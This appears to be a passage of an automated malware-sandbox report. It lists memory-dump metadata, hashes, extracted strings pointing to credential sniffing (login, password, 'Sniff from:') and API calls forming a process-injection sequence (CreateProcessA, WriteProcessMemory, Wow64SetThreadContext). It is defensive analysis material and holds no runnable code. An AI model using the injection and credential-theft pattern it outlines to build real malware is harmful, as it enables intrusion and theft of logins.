                                                                                            • API ID:
                                                                                            • String ID: $Snif$f fr$om:
                                                                                            • API String ID: 0-3434893486
                                                                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                            • Instruction ID: 9fc475f276079850749e97487467f168d8ea3c48d0f971a35a2806d85bb5f7ac
                                                                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                            • Instruction Fuzzy Hash: 8E31163151CB485FD75ADF29C0846EAB7D4FB94300F90492EE89BC7252EE74A649CB43
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $Snif$f fr$om:
                                                                                            • API String ID: 0-3434893486
                                                                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                            • Instruction ID: 87407146408d1359b81fe67c8f29fd990011dddb4c3d2471c47449d22521e960
                                                                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                            • Instruction Fuzzy Hash: C531CF7551CB886FD71ADB28C4957DAB7D4FB84300F50491EE4ABC7291EE30A54ACB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $Snif$f fr$om:
                                                                                            • API String ID: 0-3434893486
                                                                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                            • Instruction ID: d06c96f7c402d4b5f864fa76466c253012f19a394890b74447008049f7460088
                                                                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                            • Instruction Fuzzy Hash: 3631F671518B485FD759DF29C4846EAB7D4FB94300F80492FE89BC3252EE78E649CA43
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $Snif$f fr$om:
                                                                                            • API String ID: 0-3434893486
                                                                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                            • Instruction ID: a695cd76d8408200d8a4369ee019b4964d30246d3bc47d16dd33acbb98bdf7ed
                                                                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                            • Instruction Fuzzy Hash: ED31E17151CB486FD71ADB28C4956EAB7D4FB94300F40491EE4ABC3295EE30F506CA43
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                            • API String ID: 0-3136806129
                                                                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                            • Instruction ID: b2986033188b4e8d4d67bd4ab1c82c0e39182a6b0233ac008c156c931a279b85
                                                                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                            • Instruction Fuzzy Hash: 4D317C71218B184FCB84EF6A9494BAAB7E1FF98200F84467E984ACB216DF38D545C752
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                            • API String ID: 0-3136806129
                                                                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                            • Instruction ID: e3e32493aa240539298e719d8907c94b36e906b601fcc346440a541db0de113d
                                                                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                            • Instruction Fuzzy Hash: E5317E74118B488FC785EF6884A6BAAB7E1FBD8300F84466EA48ACB354DF30D945C752
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                            • API String ID: 0-3136806129
                                                                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                            • Instruction ID: dcd591405cf650def71695c4afba940d5be38df8a2b6af4dd9bf3e9312d38cf5
                                                                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                            • Instruction Fuzzy Hash: 4F319E71218B184FC784EF699494BAAB7E1FFD8300F84467E984ACB256DF38D545C742
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                            • API String ID: 0-3136806129
                                                                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                            • Instruction ID: 74e1fa42cd55b0eeb8e034ebad03a4e6b8cc0dbbea084cc86b8b2a7ab43c474a
                                                                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                            • Instruction Fuzzy Hash: 65319E74118B088FC785DF6884A5BAAB7E1FFD8300F84466EA48ACB354DF30D945CB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                            • API String ID: 0-319646191
                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                            • Instruction ID: ddd6c0d53e7dccb81a1fdc2688574aafe15266b1a505f60e2df9169482622b10
                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                            • Instruction Fuzzy Hash: 5E31CE71624B1C8BCB54EFA9D8847EEBBE4FB58214F80022BD84ED7241DE788645C799
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                            • API String ID: 0-319646191
                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                            • Instruction ID: 4738089a490288c51d24317769f3375b9ed05e86f4cbc7f74027222b147a5320
                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                            • Instruction Fuzzy Hash: 6A31BD31714A4C8FCB45EFA8C8957EEBBE1FB98214F40422EE45ED7240DE789A45C789
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                            • API String ID: 0-319646191
                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                            • Instruction ID: e4c0aa1c55b59a063b7775834de73d9e9650340467098d2becfc901d6dd59b0e
                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                            • Instruction Fuzzy Hash: 3A21BF70624B1C8BCB54EFA9C8847EEBBE4FB58204F80422FD85AD7241DE7886458799
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                            • API String ID: 0-319646191
                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                            • Instruction ID: 8a50974f14388e31956931024a452ce0c9999615e063ab3e57cae219b203452b
                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                            • Instruction Fuzzy Hash: 6321E430610A4C8FCB45EFA8C8957EDBBE5FF58214F40422EE45AD7240DF749A45C789
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .$l$l$t
                                                                                            • API String ID: 0-168566397
                                                                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                            • Instruction ID: 6ca1e53101ef5be9547298f6fca1eec2e520faa9e76a0d64a01320fc1dc1dafc
                                                                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                            • Instruction Fuzzy Hash: 05217A70A24B1D9BDB48EFA9D0447AEBAF0FB58314F90462ED449D3601DB789591CB84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
Memory Dump Source
• Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
Similarity
• API ID:
• String ID: .$l$l$t
• API String ID: 0-168566397
• Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
• Instruction ID: 709aa9138dc722b98ad62ac3377a095190ea991fb9326573388b7397eb5b98c7
• Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
• Instruction Fuzzy Hash: 15218B70A24B1D9BDB48EFA9D0447EEBBF0FB18314F90462ED449D3601DB789551CB84
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
Similarity
• API ID:
• String ID: .$l$l$t
• API String ID: 0-168566397
• Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
• Instruction ID: 97a14e5d7d3b54499e44a597a96c2e3a5357057fe497238878453013226737c5
• Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
• Instruction Fuzzy Hash: B0218B74A24A0E9FDB48EFA8C0557AEBAF0FF58310F50462EE009E3600DB74A591CB84
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
Similarity
• API ID:
• String ID: .$l$l$t
• API String ID: 0-168566397
• Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
• Instruction ID: ec8a0aae41f86e98b6ef3ad665ac7d167f27ff2b1b3f56cc43ed6c22e7bb00d2
• Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
• Instruction Fuzzy Hash: AB217C74A24A0D9BDB48EFA8D0557EEBBF1FF58314F50462EE049E3600DB74A591CB84
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
Similarity
• API ID:
• String ID: auth$logi$pass$user
• API String ID: 0-2393853802
• Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
• Instruction ID: 3dc527a80f3c6ca900376af73786082304731d146c8d15ae0bc12477ba753b2b
• Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
• Instruction Fuzzy Hash: AC21AE30624B0D8BCB45DF9998806EEB7F1EF88344F40461AD80AEB345D7B8E9148BD2
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
Similarity
• API ID:
• String ID: auth$logi$pass$user
• API String ID: 0-2393853802
• Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
• Instruction ID: 92cd898af770a6ca50bcb21f1407ae0af07f3f2ff1fbcf284ab1b0f925123040
• Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
• Instruction Fuzzy Hash: C121CD30624B0D8BCB45CF9998A17DEB7E1FF88344F00461DE44AEB244DBB0E9158BC2
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 8.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 236
Total number of Limit Nodes: 12


Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 00DAD196
• GetCurrentThread.KERNEL32 ref: 00DAD1D3
• GetCurrentProcess.KERNEL32 ref: 00DAD210
• GetCurrentThreadId.KERNEL32 ref: 00DAD269
Memory Dump Source
• Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: eaf8bc189388875203d1a69e15fb891229f068c1817829ad7a3b96df2691471d
• Instruction ID: b48c9d5235c3de8109a6781b9e6fa5565452d9446a4a47e84e5de9387fc3c8c4
• Opcode Fuzzy Hash: eaf8bc189388875203d1a69e15fb891229f068c1817829ad7a3b96df2691471d
• Instruction Fuzzy Hash: 3C5144B09003098FDB14DFAAD648BEEBBF1EF49314F248459E459A7360D7349988CB65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 00DAD196
• GetCurrentThread.KERNEL32 ref: 00DAD1D3
• GetCurrentProcess.KERNEL32 ref: 00DAD210
• GetCurrentThreadId.KERNEL32 ref: 00DAD269
Memory Dump Source
• Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 14fa6410ddd8fd91e8444e1fb5251c6a3e3daf836ce6878560de3e0da3d391a9
• Instruction ID: 03bc187ffa6a36fac4b7c696cf51a033f4714a18f7476a963f1ab0e19078d4ea
• Opcode Fuzzy Hash: 14fa6410ddd8fd91e8444e1fb5251c6a3e3daf836ce6878560de3e0da3d391a9
• Instruction Fuzzy Hash: 155123B0D003098FDB14DFAAD548BAEBBF1EF89314F248459E419A7360DB749988CF65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FCC71E
Memory Dump Source
• Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: eb243836d2b28c2622223073c15c22c67556877d610d24cb86e7b0fb755f1cb4
• Instruction ID: fb0f2b1dce9256793558d31bf418d0e390d3ab19bb4a0b3be0335bd2f5a1c7e3
• Opcode Fuzzy Hash: eb243836d2b28c2622223073c15c22c67556877d610d24cb86e7b0fb755f1cb4
• Instruction Fuzzy Hash: AAA19F71D0021ADFDB54CFA8C9417EEBBB2FF45320F1485AAE818A7240DB749985DF92
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FCC71E
Memory Dump Source
• Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 9e43417b629aaff23e8f16605e8eb1b224b13d1be20b0366fe54b62a1cf1b070
• Instruction ID: 2416908cdac7842c3afc483ec213dfae5b6eabe896861d31333bc496723e586a
• Opcode Fuzzy Hash: 9e43417b629aaff23e8f16605e8eb1b224b13d1be20b0366fe54b62a1cf1b070
• Instruction Fuzzy Hash: 77918E71D0021ADFDB54CFA8C9407EDBBB2FF49324F1485AAE818A7240DB749985CF91
Uniqueness

Uniqueness Score: -1.00%

                                                                                            Control-flow Graph: basic blocks daae90-dab110; GetModuleHandleW is called in block dab0c8-dab0f3; internal calls to da9898, dab118/dab128, daa874, daa884, daa894 and daa8a4 (executed/not-executed colouring and the edge list are omitted here).
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00DAB0E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 1a5ffb350126ac89ab6dc16955b252ff6741a29b319ed2e96c1afcbb3b1d7648
                                                                                            • Instruction ID: 15ca445150f8c2694447c67fba5c4766f5710372b2669c67fa95eca5aea0723f
                                                                                            • Opcode Fuzzy Hash: 1a5ffb350126ac89ab6dc16955b252ff6741a29b319ed2e96c1afcbb3b1d7648
                                                                                            • Instruction Fuzzy Hash: 087136B0A00B458FDB24DF2AD14175ABBF1FF89300F048A2DE48AD7A50D775E949CBA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph: basic blocks da590c-da5a61; CreateActCtxA is called in the entry block da590c-da59d9 (executed/not-executed colouring and the edge list are omitted here).
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00DA59C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: a32860e089dc58bab41a37100be1c10179619ecb25db8fd9a72c4ee8809d48fc
                                                                                            • Instruction ID: 3cec821263c310b9a4b13c29e2edc8ceffe06b807368c974638312a3fe9474d0
                                                                                            • Opcode Fuzzy Hash: a32860e089dc58bab41a37100be1c10179619ecb25db8fd9a72c4ee8809d48fc
                                                                                            • Instruction Fuzzy Hash: 034104B0D00719CFDB24CFA9D8847DDBBB5BF45304F2481AAD408AB255DBB56946CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph: basic blocks da449c-da5a61; CreateActCtxA is called in the entry block da449c-da59d9 (executed/not-executed colouring and the edge list are omitted here).
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00DA59C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 098c6ad0e4bbce8b9c4378c6a9f9855926ea63042828ee2c695aff62008acd2f
                                                                                            • Instruction ID: 8826df9ba0122b06303659c860dcb11cd506e9d31d0fb17026fb4699d7824da5
                                                                                            • Opcode Fuzzy Hash: 098c6ad0e4bbce8b9c4378c6a9f9855926ea63042828ee2c695aff62008acd2f
                                                                                            • Instruction Fuzzy Hash: 1541D2B0D0071DCBDB24DFAAC84479EBBF5BF49304F2481AAD408AB255DBB56949CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph: entry block dad421-dad428, basic blocks dad3e4-dad54e; DuplicateHandle is called in block dad3e4-dad3f4 (executed/not-executed colouring and the edge list are omitted here).
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DAD3E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1738807999.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_da0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: f9b16d9fa3e1fee8b111918f6f54313405dff7129eaf840e5f3f18fd93726b92
                                                                                            • Instruction ID: fad3e66fec236f6106cc227ea1a56b1837d317b60005852382ca0d7e2f73fd1e
                                                                                            • Opcode Fuzzy Hash: f9b16d9fa3e1fee8b111918f6f54313405dff7129eaf840e5f3f18fd93726b92
                                                                                            • Instruction Fuzzy Hash: 84316038A803848FEB04DF61E949B697BA2F7C8711F118929E915CB3E5CEB48857DF10
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph: basic blocks 6fcc258-6fcc336; WriteProcessMemory is called in block 6fcc2be-6fcc2fd (executed/not-executed colouring and the edge list are omitted here).
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FCC2F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 2cd7301adf06ce5567c0efd00983021652a84fcfd65fddbbb3c222996c25a7d7
                                                                                            • Instruction ID: 192000781c6e2bebc2eb4118a3e8d4ab6e6cbbbe8dfb945486cbeda845ed0c8c
                                                                                            • Opcode Fuzzy Hash: 2cd7301adf06ce5567c0efd00983021652a84fcfd65fddbbb3c222996c25a7d7
                                                                                            • Instruction Fuzzy Hash: 462148B1D003599FCB10CFA9C985BDEBBF4FF48320F10842AE959A7240C7789544CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FCC2F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 65ca3a5165641f2fdd70f700d0399f831cf4a82d01b61408b31f7bc93608b4d3
                                                                                            • Instruction ID: c3c9295ee8e648f3752751db25a46fd614c47db3ba8c1a39d5b0c543cf845108
                                                                                            • Opcode Fuzzy Hash: 65ca3a5165641f2fdd70f700d0399f831cf4a82d01b61408b31f7bc93608b4d3
                                                                                            • Instruction Fuzzy Hash: C42127B1D003599FCB10CFA9C985BDEBBF5FF48320F10842AE959A7250C7789944CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph: basic blocks 6fcbc88-6fcbd54; Wow64SetThreadContext is called in block 6fcbceb-6fcbd1b (executed/not-executed colouring and the edge list are omitted here).
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FCBD0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.1745021468.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_6fc0000_SdYCcXyq.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 52fbe7004e143d496268095040d4ba56b6811bd6fe4f06c2bda424140a685cc6
                                                                                            • Instruction ID: b8758c97eebcd9793fccb00f0f6809094b898d30aad31f999cdd2ef487fb6771
                                                                                            • Opcode Fuzzy Hash: 52fbe7004e143d496268095040d4ba56b6811bd6fe4f06c2bda424140a685cc6
                                                                                            • Instruction Fuzzy Hash: CE2139B5D002098FDB10DFAAC5857EEBBF5EF48324F10842ED459A7240CB789985CFA5
                                                                                            Uniqueness

